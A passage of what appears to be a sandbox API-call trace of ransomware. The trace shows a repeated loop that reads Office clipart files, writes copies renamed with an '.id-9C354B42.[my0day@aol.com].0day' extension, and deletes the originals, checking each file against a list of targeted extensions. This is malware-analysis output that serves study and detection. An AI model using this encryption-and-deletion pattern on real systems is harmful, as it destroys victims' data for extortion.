(lpString1=".xls", lpString2=".WMF") returned 1 [0055.397] lstrlenW (lpString=".xlsx") returned 5 [0055.397] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.397] lstrlenW (lpString=".ppt") returned 4 [0055.397] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0055.397] lstrlenW (lpString=".zip") returned 4 [0055.398] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.398] lstrlenW (lpString=".rar") returned 4 [0055.398] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.398] lstrlenW (lpString=".bz2") returned 4 [0055.398] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.398] lstrlenW (lpString=".7z") returned 3 [0055.398] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0055.398] lstrlenW (lpString=".dbf") returned 4 [0055.398] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0055.398] lstrlenW (lpString=".1cd") returned 4 [0055.398] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 63 [0055.398] lstrlenW (lpString=".jpg") returned 4 [0055.398] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.399] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=2108) returned 1 [0055.399] CloseHandle (hObject=0x178) returned 1 [0055.399] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf")) returned 0x20 [0055.399] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0055.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0055.399] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.400] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0055.400] GetLastError () returned 0x0 [0055.400] ReadFile (in: hFile=0x178, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x83c, lpOverlapped=0x0) returned 1 [0055.401] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x840, lpOverlapped=0x0) returned 1 [0055.402] ReadFile (in: hFile=0x178, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.402] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.402] SetEndOfFile (hFile=0x1c4) returned 1 [0055.403] CloseHandle (hObject=0x1c4) returned 1 [0055.403] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.403] SetEndOfFile (hFile=0x178) returned 1 [0055.403] CloseHandle (hObject=0x178) returned 1 [0055.404] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0055.404] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02724_.wmf")) returned 1 [0055.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0055.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0055.404] lstrlenW (lpString=".doc") returned 4 [0055.404] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.404] lstrlenW (lpString=".docx") returned 5 [0055.404] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.404] lstrlenW (lpString=".pdf") returned 4 [0055.404] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.404] lstrlenW (lpString=".xls") returned 4 [0055.404] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.404] lstrlenW (lpString=".xlsx") returned 5 [0055.404] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.404] lstrlenW (lpString=".ppt") returned 4 [0055.404] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.404] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0055.404] lstrlenW (lpString=".zip") returned 4 [0055.404] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.404] lstrlenW (lpString=".rar") returned 4 [0055.404] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.404] lstrlenW (lpString=".bz2") returned 4 [0055.405] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.405] lstrlenW (lpString=".7z") returned 3 [0055.405] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0055.405] lstrlenW (lpString=".dbf") returned 4 [0055.405] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0055.405] lstrlenW (lpString=".1cd") returned 4 [0055.405] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.405] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02724_.WMF") returned 63 [0055.405] lstrlenW (lpString=".jpg") returned 4 [0055.405] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.405] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.405] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0055.406] GetLastError () returned 0x0 [0055.406] ReadFile (in: hFile=0x178, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x2418, lpOverlapped=0x0) returned 1 [0055.407] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x2420, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x2420, lpOverlapped=0x0) returned 1 [0055.408] ReadFile (in: hFile=0x178, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.408] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.408] SetEndOfFile (hFile=0x1c4) returned 1 [0055.408] CloseHandle (hObject=0x1c4) returned 1 [0055.408] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.408] SetEndOfFile (hFile=0x178) returned 1 [0055.409] CloseHandle (hObject=0x178) returned 1 [0055.409] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0055.410] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf")) returned 1 [0055.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0055.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0055.410] lstrlenW (lpString=".doc") returned 4 [0055.410] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.410] lstrlenW (lpString=".docx") returned 5 [0055.410] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.410] lstrlenW (lpString=".pdf") returned 4 [0055.410] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.410] lstrlenW (lpString=".xls") returned 4 [0055.410] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.410] lstrlenW (lpString=".xlsx") returned 5 [0055.410] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.410] lstrlenW (lpString=".ppt") returned 4 [0055.410] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0055.410] lstrlenW (lpString=".zip") returned 4 [0055.410] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.410] lstrlenW (lpString=".rar") returned 4 [0055.410] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.410] lstrlenW (lpString=".bz2") returned 4 [0055.410] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.410] lstrlenW (lpString=".7z") returned 3 [0055.411] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0055.411] lstrlenW (lpString=".dbf") returned 4 [0055.411] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0055.411] lstrlenW (lpString=".1cd") returned 4 [0055.411] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0055.411] lstrlenW (lpString=".jpg") returned 4 [0055.411] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.411] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.411] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.411] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0055.412] GetLastError () returned 0x0 [0055.412] ReadFile (in: hFile=0x178, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x928, lpOverlapped=0x0) returned 1 [0055.414] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x930, lpOverlapped=0x0) returned 1 [0055.415] ReadFile (in: hFile=0x178, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.415] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.415] SetEndOfFile (hFile=0x1c4) returned 1 [0055.415] CloseHandle (hObject=0x1c4) returned 1 [0055.415] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.415] SetEndOfFile (hFile=0x178) returned 1 [0055.416] CloseHandle (hObject=0x178) returned 1 [0055.416] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0055.416] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04108_.wmf")) returned 1 [0055.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0055.416] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0055.416] lstrlenW (lpString=".doc") returned 4 [0055.416] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.416] lstrlenW (lpString=".docx") returned 5 [0055.416] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.416] lstrlenW (lpString=".pdf") returned 4 [0055.416] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.416] lstrlenW (lpString=".xls") returned 4 [0055.417] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.417] lstrlenW (lpString=".xlsx") returned 5 [0055.417] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.417] lstrlenW (lpString=".ppt") returned 4 [0055.417] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0055.417] lstrlenW (lpString=".zip") returned 4 [0055.417] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.417] lstrlenW (lpString=".rar") returned 4 [0055.417] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.417] lstrlenW (lpString=".bz2") returned 4 [0055.417] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.417] lstrlenW (lpString=".7z") returned 3 [0055.417] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0055.417] lstrlenW (lpString=".dbf") returned 4 [0055.417] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0055.417] lstrlenW (lpString=".1cd") returned 4 [0055.417] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 63 [0055.417] lstrlenW (lpString=".jpg") returned 4 [0055.417] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.417] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.418] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0055.418] GetLastError () returned 0x0 [0055.418] ReadFile (in: hFile=0x178, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x17ac, lpOverlapped=0x0) returned 1 [0055.419] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x17b0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x17b0, lpOverlapped=0x0) returned 1 [0055.420] ReadFile (in: hFile=0x178, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.420] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.420] SetEndOfFile (hFile=0x1c4) returned 1 [0055.420] CloseHandle (hObject=0x1c4) returned 1 [0055.421] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.421] SetEndOfFile (hFile=0x178) returned 1 [0055.421] CloseHandle (hObject=0x178) returned 1 [0055.421] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0055.422] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04117_.wmf")) returned 1 [0055.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0055.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0055.422] lstrlenW (lpString=".doc") returned 4 [0055.422] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.422] lstrlenW (lpString=".docx") returned 5 [0055.422] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.422] lstrlenW (lpString=".pdf") returned 4 [0055.422] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.422] lstrlenW (lpString=".xls") returned 4 [0055.422] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.422] lstrlenW (lpString=".xlsx") returned 5 [0055.422] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.422] lstrlenW (lpString=".ppt") returned 4 [0055.422] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0055.422] lstrlenW (lpString=".zip") returned 4 [0055.422] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.422] lstrlenW (lpString=".rar") returned 4 [0055.422] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.422] lstrlenW (lpString=".bz2") returned 4 [0055.422] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.422] lstrlenW (lpString=".7z") returned 3 [0055.422] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0055.423] lstrlenW (lpString=".dbf") returned 4 [0055.423] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0055.423] lstrlenW (lpString=".1cd") returned 4 [0055.423] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04117_.WMF") returned 63 [0055.423] lstrlenW (lpString=".jpg") returned 4 [0055.423] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.423] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.423] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.423] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0055.424] GetLastError () returned 0x0 [0055.424] ReadFile (in: hFile=0x178, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0xd58, lpOverlapped=0x0) returned 1 [0055.425] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xd60, lpOverlapped=0x0) returned 1 [0055.426] ReadFile (in: hFile=0x178, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.426] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.426] SetEndOfFile (hFile=0x1c4) returned 1 [0055.426] CloseHandle (hObject=0x1c4) returned 1 [0055.426] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.426] SetEndOfFile (hFile=0x178) returned 1 [0055.427] CloseHandle (hObject=0x178) returned 1 [0055.427] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0055.427] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf")) returned 1 [0055.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0055.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0055.428] lstrlenW (lpString=".doc") returned 4 [0055.428] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.428] lstrlenW (lpString=".docx") returned 5 [0055.428] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.428] lstrlenW (lpString=".pdf") returned 4 [0055.428] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.428] lstrlenW (lpString=".xls") returned 4 [0055.428] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.428] lstrlenW (lpString=".xlsx") returned 5 [0055.428] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.428] lstrlenW (lpString=".ppt") returned 4 [0055.428] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0055.428] lstrlenW (lpString=".zip") returned 4 [0055.428] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.428] lstrlenW (lpString=".rar") returned 4 [0055.428] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.428] lstrlenW (lpString=".bz2") returned 4 [0055.428] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.428] lstrlenW (lpString=".7z") returned 3 [0055.428] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0055.428] lstrlenW (lpString=".dbf") returned 4 [0055.428] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0055.428] lstrlenW (lpString=".1cd") returned 4 [0055.428] lstrcmpiW 